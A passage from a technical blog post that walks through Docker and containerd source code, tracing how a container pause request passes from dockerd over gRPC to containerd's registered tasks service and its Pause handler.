<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">containerRouter</span><span class="p">)</span> <span class="n">postContainersPause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">w</span> <span class="n">http</span><span class="o">.</span><span class="n">ResponseWriter</span><span class="p">,</span> <span class="n">r</span> <span class="o">*</span><span class="n">http</span><span class="o">.</span><span class="n">Request</span><span class="p">,</span> <span class="n">vars</span> <span class="k">map</span><span class="p">[</span><span class="kt">string</span><span class="p">]</span><span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">backend</span><span class="o">.</span><span class="n">ContainerPause</span><span class="p">(</span><span class="n">vars</span><span class="p">[</span><span class="s">"name"</span><span class="p">]);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// &lt;--------</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="p">}</span>

    <span class="n">w</span><span class="o">.</span><span class="n">WriteHeader</span><span class="p">(</span><span class="n">http</span><span class="o">.</span><span class="n">StatusNoContent</span><span class="p">)</span> <span class="c">// response to docker-cli</span>
    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="c">// daemon/pause.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">daemon</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">)</span> <span class="n">ContainerPause</span><span class="p">(</span><span class="n">name</span> <span class="kt">string</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">ctr</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">daemon</span><span class="o">.</span><span class="n">GetContainer</span><span class="p">(</span><span class="n">name</span><span class="p">)</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">daemon</span><span class="o">.</span><span class="n">containerPause</span><span class="p">(</span><span class="n">ctr</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">daemon</span> <span class="o">*</span><span class="n">Daemon</span><span class="p">)</span> <span class="n">containerPause</span><span class="p">(</span><span class="n">container</span> <span class="o">*</span><span class="n">container</span><span class="o">.</span><span class="n">Container</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">tsk</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">container</span><span class="o">.</span><span class="n">GetRunningTask</span><span class="p">()</span>
    <span class="c">// [...]</span>
    <span class="n">tsk</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">context</span><span class="o">.</span><span class="n">Background</span><span class="p">())</span> <span class="c">// &lt;--------</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="k">func</span> <span class="p">(</span><span class="n">t</span> <span class="o">*</span><span class="n">task</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">t</span><span class="o">.</span><span class="n">Task</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">)</span> <span class="c">// [2]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>You may not find the definition of <code class="language-plaintext highlighter-rouge">.Pause()</code> because it invokes the <code class="language-plaintext highlighter-rouge">Task</code> interface [3] provided by <code class="language-plaintext highlighter-rouge">containerd</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// daemon/internal/libcontainerd/remote/client.go</span>
<span class="n">import</span> <span class="p">(</span>
    <span class="c1">// [...]</span>
    <span class="n">containerd</span> <span class="s">"github.com/containerd/containerd/v2/client"</span>
    <span class="c1">// [...]</span>
<span class="p">)</span>

<span class="n">type</span> <span class="n">task</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">containerd</span><span class="p">.</span><span class="n">Task</span> <span class="c1">// [3]</span>
    <span class="n">ctr</span> <span class="o">*</span><span class="n">container</span>
<span class="p">}</span>
</code></pre></div></div>

<p>By grepping through the source code of <a href="https://github.com/containerd/containerd"><code class="language-plaintext highlighter-rouge">containerd</code></a>, we can see that the <code class="language-plaintext highlighter-rouge">Task</code>’s pause handler is defined in <code class="language-plaintext highlighter-rouge">client/task.go</code>. <code class="language-plaintext highlighter-rouge">Pause()</code> wraps the container ID into a <code class="language-plaintext highlighter-rouge">PauseTaskRequest</code> [4], which is a <strong>Protobuf-formatted</strong> structure.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// client/task.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">t</span> <span class="o">*</span><span class="n">task</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="n">_</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">t</span><span class="o">.</span><span class="n">client</span><span class="o">.</span><span class="n">TaskService</span><span class="p">()</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">tasks</span><span class="o">.</span><span class="n">PauseTaskRequest</span><span class="p">{</span>  <span class="c">// [4]</span>
        <span class="n">ContainerID</span><span class="o">:</span> <span class="n">t</span><span class="o">.</span><span class="n">id</span><span class="p">,</span>
    <span class="p">})</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// api/services/tasks/v1/tasks.pb.go</span>
<span class="k">type</span> <span class="n">PauseTaskRequest</span> <span class="k">struct</span> <span class="p">{</span>
    <span class="n">state</span>         <span class="n">protoimpl</span><span class="o">.</span><span class="n">MessageState</span>
    <span class="n">sizeCache</span>     <span class="n">protoimpl</span><span class="o">.</span><span class="n">SizeCache</span>
    <span class="n">unknownFields</span> <span class="n">protoimpl</span><span class="o">.</span><span class="n">UnknownFields</span>

    <span class="n">ContainerID</span> <span class="kt">string</span> <span class="s">`protobuf:"bytes,1,opt,name=container_id,json=containerId,proto3" json:"container_id,omitempty"`</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Noted that there are many versions of <code class="language-plaintext highlighter-rouge">tasks</code>, and it can be confusing to tell which one is being used. You can identify the correct one by <strong>checking the package name</strong> [5].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// client/client.go</span>
<span class="k">import</span> <span class="p">(</span>
    <span class="c">// [...]</span>
    <span class="s">"github.com/containerd/containerd/api/services/tasks/v1"</span> <span class="c">// [5]</span>
    <span class="c">// [...]</span>
<span class="p">)</span>

<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">Client</span><span class="p">)</span> <span class="n">TaskService</span><span class="p">()</span> <span class="n">tasks</span><span class="o">.</span><span class="n">TasksClient</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">return</span> <span class="n">tasks</span><span class="o">.</span><span class="n">NewTasksClient</span><span class="p">(</span><span class="n">c</span><span class="o">.</span><span class="n">conn</span><span class="p">)</span> <span class="c">// v1</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Following the function call, the client connection eventually calls <code class="language-plaintext highlighter-rouge">SendMsg()</code> [6] with the gRPC data as a parameter, sending the Protobuf payload to <code class="language-plaintext highlighter-rouge">containerd</code> via <code class="language-plaintext highlighter-rouge">containerd.sock</code>.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// api/services/tasks/v1/tasks_grpc.pb.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">c</span> <span class="o">*</span><span class="n">tasksClient</span><span class="p">)</span> <span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">in</span> <span class="o">*</span><span class="n">PauseTaskRequest</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">grpc</span><span class="o">.</span><span class="n">CallOption</span><span class="p">)</span> <span class="p">(</span><span class="o">*</span><span class="n">emptypb</span><span class="o">.</span><span class="n">Empty</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">out</span> <span class="o">:=</span> <span class="nb">new</span><span class="p">(</span><span class="n">emptypb</span><span class="o">.</span><span class="n">Empty</span><span class="p">)</span>
    <span class="n">err</span> <span class="o">:=</span> <span class="n">c</span><span class="o">.</span><span class="n">cc</span><span class="o">.</span><span class="n">Invoke</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="s">"/containerd.services.tasks.v1.Tasks/Pause"</span><span class="p">,</span> <span class="n">in</span><span class="p">,</span> <span class="n">out</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span>
    <span class="c">// [...]</span>
<span class="p">}</span>

<span class="c">// vendor/google.golang.org/grpc/call.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">cc</span> <span class="o">*</span><span class="n">ClientConn</span><span class="p">)</span> <span class="n">Invoke</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">method</span> <span class="kt">string</span><span class="p">,</span> <span class="n">args</span><span class="p">,</span> <span class="n">reply</span> <span class="n">any</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">CallOption</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">opts</span> <span class="o">=</span> <span class="n">combine</span><span class="p">(</span><span class="n">cc</span><span class="o">.</span><span class="n">dopts</span><span class="o">.</span><span class="n">callOptions</span><span class="p">,</span> <span class="n">opts</span><span class="p">)</span>
    <span class="k">return</span> <span class="n">invoke</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">method</span><span class="p">,</span> <span class="n">args</span><span class="p">,</span> <span class="n">reply</span><span class="p">,</span> <span class="n">cc</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="k">func</span> <span class="n">Invoke</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">method</span> <span class="kt">string</span><span class="p">,</span> <span class="n">args</span><span class="p">,</span> <span class="n">reply</span> <span class="n">any</span><span class="p">,</span> <span class="n">cc</span> <span class="o">*</span><span class="n">ClientConn</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">CallOption</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="k">return</span> <span class="n">cc</span><span class="o">.</span><span class="n">Invoke</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">method</span><span class="p">,</span> <span class="n">args</span><span class="p">,</span> <span class="n">reply</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="k">var</span> <span class="n">unaryStreamDesc</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">StreamDesc</span><span class="p">{</span><span class="n">ServerStreams</span><span class="o">:</span> <span class="no">false</span><span class="p">,</span> <span class="n">ClientStreams</span><span class="o">:</span> <span class="no">false</span><span class="p">}</span>
<span class="k">func</span> <span class="n">invoke</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">method</span> <span class="kt">string</span><span class="p">,</span> <span class="n">req</span><span class="p">,</span> <span class="n">reply</span> <span class="n">any</span><span class="p">,</span> <span class="n">cc</span> <span class="o">*</span><span class="n">ClientConn</span><span class="p">,</span> <span class="n">opts</span> <span class="o">...</span><span class="n">CallOption</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">cs</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">newClientStream</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">unaryStreamDesc</span><span class="p">,</span> <span class="n">cc</span><span class="p">,</span> <span class="n">method</span><span class="p">,</span> <span class="n">opts</span><span class="o">...</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">cs</span><span class="o">.</span><span class="n">SendMsg</span><span class="p">(</span><span class="n">req</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span> <span class="c">// [6]</span>
        <span class="k">return</span> <span class="n">err</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="n">cs</span><span class="o">.</span><span class="n">RecvMsg</span><span class="p">(</span><span class="n">reply</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<h2 id="3-containerd">3. containerd</h2>

<p>The containerd GitHub repo provides a <a href="https://github.com/containerd/containerd/blob/main/docs/historical/design/architecture.png">clear diagram</a> of its architecture:</p>

<p><img src="/assets/image-20260526000000000.png" alt="image-20260526000000000" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<p>For example, according to the diagram, container pausing is related to the container runtime, which is managed by <code class="language-plaintext highlighter-rouge">Task</code>. In the previous section, we traced the call flow and confirmed that container pausing is actually handled by <code class="language-plaintext highlighter-rouge">containerd.Task</code> in <code class="language-plaintext highlighter-rouge">dockerd</code>.</p>

<p>Next, we’ll trace the code flow to understand how <code class="language-plaintext highlighter-rouge">containerd</code> receives and handles requests from <code class="language-plaintext highlighter-rouge">dockerd</code>.</p>

<h3 id="31-receive-requests-from-dockerd">3.1. Receive Requests from dockerd</h3>

<p>When the <code class="language-plaintext highlighter-rouge">containerd</code> daemon runs, the <code class="language-plaintext highlighter-rouge">builtins</code> and <code class="language-plaintext highlighter-rouge">command</code> package are imported [1, 2], and <code class="language-plaintext highlighter-rouge">App()</code> sets up two services: TTRPC (Tiny RPC) [3] and GRPC [4]. Whether the debug service is set up depends on the configuration [5].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// cmd/containerd/main.go</span>
<span class="k">import</span> <span class="p">(</span>
    <span class="c">// [...]</span>
    <span class="s">"github.com/containerd/containerd/v2/cmd/containerd/command"</span> <span class="c">// [1]</span>
    <span class="n">_</span> <span class="s">"github.com/containerd/containerd/v2/cmd/containerd/builtins"</span> <span class="c">// [2]</span>
    <span class="c">// [...]</span>
<span class="p">)</span>

<span class="k">func</span> <span class="n">main</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">app</span> <span class="o">:=</span> <span class="n">command</span><span class="o">.</span><span class="n">App</span><span class="p">()</span> <span class="c">// &lt;--------</span>
    <span class="k">if</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">app</span><span class="o">.</span><span class="n">Run</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">Args</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c">// cmd/containerd/command/main.go</span>
<span class="k">func</span> <span class="n">App</span><span class="p">()</span> <span class="o">*</span><span class="n">cli</span><span class="o">.</span><span class="n">App</span> <span class="p">{</span>
    <span class="c">// [...]</span>
    <span class="k">if</span> <span class="n">config</span><span class="o">.</span><span class="n">Debug</span><span class="o">.</span><span class="n">Address</span> <span class="o">!=</span> <span class="s">""</span> <span class="p">{</span> <span class="c">// [5]</span>
        <span class="k">var</span> <span class="n">l</span> <span class="n">net</span><span class="o">.</span><span class="n">Listener</span>
        <span class="k">if</span> <span class="n">isLocalAddress</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">Debug</span><span class="o">.</span><span class="n">Address</span><span class="p">)</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">l</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">sys</span><span class="o">.</span><span class="n">GetLocalListener</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">Debug</span><span class="o">.</span><span class="n">Address</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">Debug</span><span class="o">.</span><span class="n">UID</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">Debug</span><span class="o">.</span><span class="n">GID</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
                <span class="c">// [...]</span>
            <span class="p">}</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">l</span><span class="p">,</span> <span class="n">err</span> <span class="o">=</span> <span class="n">net</span><span class="o">.</span><span class="n">Listen</span><span class="p">(</span><span class="s">"tcp"</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">Debug</span><span class="o">.</span><span class="n">Address</span><span class="p">);</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
                <span class="c">// [...]</span>
            <span class="p">}</span>
        <span class="p">}</span>
        <span class="n">serve</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">l</span><span class="p">,</span> <span class="n">server</span><span class="o">.</span><span class="n">ServeDebug</span><span class="p">)</span>
    <span class="p">}</span>
    <span class="c">// [...]</span>

    <span class="n">tl</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">sys</span><span class="o">.</span><span class="n">GetLocalListener</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">TTRPC</span><span class="o">.</span><span class="n">Address</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">TTRPC</span><span class="o">.</span><span class="n">UID</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">TTRPC</span><span class="o">.</span><span class="n">GID</span><span class="p">)</span>
    <span class="n">serve</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">tl</span><span class="p">,</span> <span class="n">server</span><span class="o">.</span><span class="n">ServeTTRPC</span><span class="p">)</span> <span class="c">// [3]</span>
    
    <span class="c">// [...]</span>
    
    <span class="n">l</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">sys</span><span class="o">.</span><span class="n">GetLocalListener</span><span class="p">(</span><span class="n">config</span><span class="o">.</span><span class="n">GRPC</span><span class="o">.</span><span class="n">Address</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">GRPC</span><span class="o">.</span><span class="n">UID</span><span class="p">,</span> <span class="n">config</span><span class="o">.</span><span class="n">GRPC</span><span class="o">.</span><span class="n">GID</span><span class="p">)</span>
    <span class="n">serve</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">l</span><span class="p">,</span> <span class="n">server</span><span class="o">.</span><span class="n">ServeGRPC</span><span class="p">)</span> <span class="c">// [4]</span>
    
    <span class="c">// [...]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">builtins</code> package is a wrapper for built-in packages, and one of the built-in packages it imports is <code class="language-plaintext highlighter-rouge">tasks</code> [6]. The <code class="language-plaintext highlighter-rouge">init()</code> function of the <code class="language-plaintext highlighter-rouge">tasks</code> package is invoked when the package is imported, and it calls <code class="language-plaintext highlighter-rouge">Register()</code> [7] to register itself with the registry.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// cmd/containerd/builtins/builtins.go</span>
<span class="k">import</span> <span class="p">(</span>
    <span class="c">// [...]</span>
    <span class="n">_</span> <span class="s">"github.com/containerd/containerd/v2/plugins/services/tasks"</span> <span class="c">// [6]</span>
    <span class="c">// [...]</span>
<span class="p">)</span>

<span class="c">// plugins/services/tasks/service.go</span>
<span class="k">func</span> <span class="n">init</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">registry</span><span class="o">.</span><span class="n">Register</span><span class="p">(</span><span class="o">&amp;</span><span class="n">plugin</span><span class="o">.</span><span class="n">Registration</span><span class="p">{</span> <span class="c">// [7]</span>
        <span class="n">Type</span><span class="o">:</span> <span class="n">plugins</span><span class="o">.</span><span class="n">GRPCPlugin</span><span class="p">,</span>
        <span class="n">ID</span><span class="o">:</span>   <span class="s">"tasks"</span><span class="p">,</span>
        <span class="n">Requires</span><span class="o">:</span> <span class="p">[]</span><span class="n">plugin</span><span class="o">.</span><span class="n">Type</span><span class="p">{</span>
            <span class="n">plugins</span><span class="o">.</span><span class="n">ServicePlugin</span><span class="p">,</span>
        <span class="p">},</span>
        <span class="n">InitFn</span><span class="o">:</span> <span class="k">func</span><span class="p">(</span><span class="n">ic</span> <span class="o">*</span><span class="n">plugin</span><span class="o">.</span><span class="n">InitContext</span><span class="p">)</span> <span class="p">(</span><span class="n">any</span><span class="p">,</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">i</span><span class="p">,</span> <span class="n">err</span> <span class="o">:=</span> <span class="n">ic</span><span class="o">.</span><span class="n">GetByID</span><span class="p">(</span><span class="n">plugins</span><span class="o">.</span><span class="n">ServicePlugin</span><span class="p">,</span> <span class="n">services</span><span class="o">.</span><span class="n">TasksService</span><span class="p">)</span>
            <span class="k">if</span> <span class="n">err</span> <span class="o">!=</span> <span class="no">nil</span> <span class="p">{</span>
                <span class="k">return</span> <span class="no">nil</span><span class="p">,</span> <span class="n">err</span>
            <span class="p">}</span>
            <span class="k">return</span> <span class="o">&amp;</span><span class="n">service</span><span class="p">{</span><span class="n">local</span><span class="o">:</span> <span class="n">i</span><span class="o">.</span><span class="p">(</span><span class="n">api</span><span class="o">.</span><span class="n">TasksClient</span><span class="p">)},</span> <span class="no">nil</span>
        <span class="p">},</span>
    <span class="p">})</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Later, when the server prepares to run, the <code class="language-plaintext highlighter-rouge">Register()</code> method of every registered service is called to set up gRPC endpoints based on predefined descriptors [8], and <strong>their handlers are finally attached</strong> [9].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/services/tasks/service.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">Register</span><span class="p">(</span><span class="n">server</span> <span class="o">*</span><span class="n">grpc</span><span class="o">.</span><span class="n">Server</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">api</span><span class="o">.</span><span class="n">RegisterTasksServer</span><span class="p">(</span><span class="n">server</span><span class="p">,</span> <span class="n">s</span><span class="p">)</span> <span class="c">// &lt;--------</span>
    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>

<span class="c">// api/services/tasks/v1/tasks_grpc.pb.go</span>
<span class="k">func</span> <span class="n">RegisterTasksServer</span><span class="p">(</span><span class="n">s</span> <span class="n">grpc</span><span class="o">.</span><span class="n">ServiceRegistrar</span><span class="p">,</span> <span class="n">srv</span> <span class="n">TasksServer</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">s</span><span class="o">.</span><span class="n">RegisterService</span><span class="p">(</span><span class="o">&amp;</span><span class="n">Tasks_ServiceDesc</span><span class="p">,</span> <span class="n">srv</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="k">var</span> <span class="n">Tasks_ServiceDesc</span> <span class="o">=</span> <span class="n">grpc</span><span class="o">.</span><span class="n">ServiceDesc</span><span class="p">{</span> <span class="c">// [8]</span>
    <span class="n">ServiceName</span><span class="o">:</span> <span class="s">"containerd.services.tasks.v1.Tasks"</span><span class="p">,</span>
    <span class="n">HandlerType</span><span class="o">:</span> <span class="p">(</span><span class="o">*</span><span class="n">TasksServer</span><span class="p">)(</span><span class="no">nil</span><span class="p">),</span>
    <span class="n">Methods</span><span class="o">:</span> <span class="p">[]</span><span class="n">grpc</span><span class="o">.</span><span class="n">MethodDesc</span><span class="p">{</span>
        <span class="c">// [...]</span>
        <span class="p">{</span>
            <span class="n">MethodName</span><span class="o">:</span> <span class="s">"Pause"</span><span class="p">,</span>
            <span class="n">Handler</span><span class="o">:</span>    <span class="n">_Tasks_Pause_Handler</span><span class="p">,</span> <span class="c">// [9]</span>
        <span class="p">},</span>
        <span class="c">// [...]</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So if we send a request to the <code class="language-plaintext highlighter-rouge">"/containerd.services.tasks.v1.Tasks/Pause"</code> gRPC endpoint, <code class="language-plaintext highlighter-rouge">_Tasks_Pause_Handler()</code> will be invoked.</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">func</span> <span class="n">_Tasks_Pause_Handler</span><span class="p">(</span><span class="n">srv</span> <span class="k">interface</span><span class="p">{},</span> <span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">dec</span> <span class="k">func</span><span class="p">(</span><span class="k">interface</span><span class="p">{})</span> <span class="kt">error</span><span class="p">,</span> <span class="n">interceptor</span> <span class="n">grpc</span><span class="o">.</span><span class="n">UnaryServerInterceptor</span><span class="p">)</span> <span class="p">(</span><span class="k">interface</span><span class="p">{},</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">in</span> <span class="o">:=</span> <span class="nb">new</span><span class="p">(</span><span class="n">PauseTaskRequest</span><span class="p">)</span>
    <span class="n">info</span> <span class="o">:=</span> <span class="o">&amp;</span><span class="n">grpc</span><span class="o">.</span><span class="n">UnaryServerInfo</span><span class="p">{</span>
        <span class="n">Server</span><span class="o">:</span>     <span class="n">srv</span><span class="p">,</span>
        <span class="n">FullMethod</span><span class="o">:</span> <span class="s">"/containerd.services.tasks.v1.Tasks/Pause"</span><span class="p">,</span>
    <span class="p">}</span>
    <span class="n">handler</span> <span class="o">:=</span> <span class="k">func</span><span class="p">(</span><span class="n">ctx</span> <span class="n">context</span><span class="o">.</span><span class="n">Context</span><span class="p">,</span> <span class="n">req</span> <span class="k">interface</span><span class="p">{})</span> <span class="p">(</span><span class="k">interface</span><span class="p">{},</span> <span class="kt">error</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">srv</span><span class="o">.</span><span class="p">(</span><span class="n">TasksServer</span><span class="p">)</span><span class="o">.</span><span class="n">Pause</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">req</span><span class="o">.</span><span class="p">(</span><span class="o">*</span><span class="n">PauseTaskRequest</span><span class="p">))</span>
    <span class="p">}</span>
    <span class="k">return</span> <span class="n">interceptor</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">in</span><span class="p">,</span> <span class="n">info</span><span class="p">,</span> <span class="n">handler</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<h3 id="32-dispatch-request-to-shim-daemon">3.2. Dispatch Request to shim Daemon</h3>

<p>To trace the actual handler behind <code class="language-plaintext highlighter-rouge">srv.(TasksServer).Pause()</code>, we need to go back and find where <code class="language-plaintext highlighter-rouge">TasksServer</code> comes from. <code class="language-plaintext highlighter-rouge">srv</code> is the second parameter passed to <code class="language-plaintext highlighter-rouge">RegisterTasksServer()</code>, and <code class="language-plaintext highlighter-rouge">s</code> is a <code class="language-plaintext highlighter-rouge">service</code> object defined in <code class="language-plaintext highlighter-rouge">plugins/services/tasks/service.go</code> [1].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// api/services/tasks/v1/tasks_grpc.pb.go</span>
<span class="k">func</span> <span class="n">RegisterTasksServer</span><span class="p">(</span><span class="n">s</span> <span class="n">grpc</span><span class="o">.</span><span class="n">ServiceRegistrar</span><span class="p">,</span> <span class="n">srv</span> <span class="n">TasksServer</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">s</span><span class="o">.</span><span class="n">RegisterService</span><span class="p">(</span><span class="o">&amp;</span><span class="n">Tasks_ServiceDesc</span><span class="p">,</span> <span class="n">srv</span><span class="p">)</span> <span class="c">// &lt;--------</span>
<span class="p">}</span>

<span class="c">// plugins/services/tasks/service.go</span>
<span class="k">func</span> <span class="p">(</span><span class="n">s</span> <span class="o">*</span><span class="n">service</span><span class="p">)</span> <span class="n">Register</span><span class="p">(</span><span class="n">server</span> <span class="o">*</span><span class="n">grpc</span><span class="o">.</span><span class="n">Server</span><span class="p">)</span> <span class="kt">error</span> <span class="p">{</span>
    <span class="n">api</span><span class="o">.</span><span class="n">RegisterTasksServer</span><span class="p">(</span><span class="n">server</span><span class="p">,</span> <span class="n">s</span><span class="p">)</span> <span class="c">// [1]</span>
    <span class="k">return</span> <span class="no">nil</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">service</code>’s pause handler then calls <code class="language-plaintext highlighter-rouge">s.local.Pause()</code> [2], where <code class="language-plaintext highlighter-rouge">local</code> is assigned from the retrieved initial context <code class="language-plaintext highlighter-rouge">i</code> object during initialization [3]. The <code class="language-plaintext highlighter-rouge">i</code> is retrieved by an ID equal to <code class="language-plaintext highlighter-rouge">services.TasksService</code> [4], which corresponds to the local task object defined in <code class="language-plaintext highlighter-rouge">plugins/services/tasks/local.go</code> [5].</p>

<div class="language-go highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">// plugins/services/tasks/service.go</span>
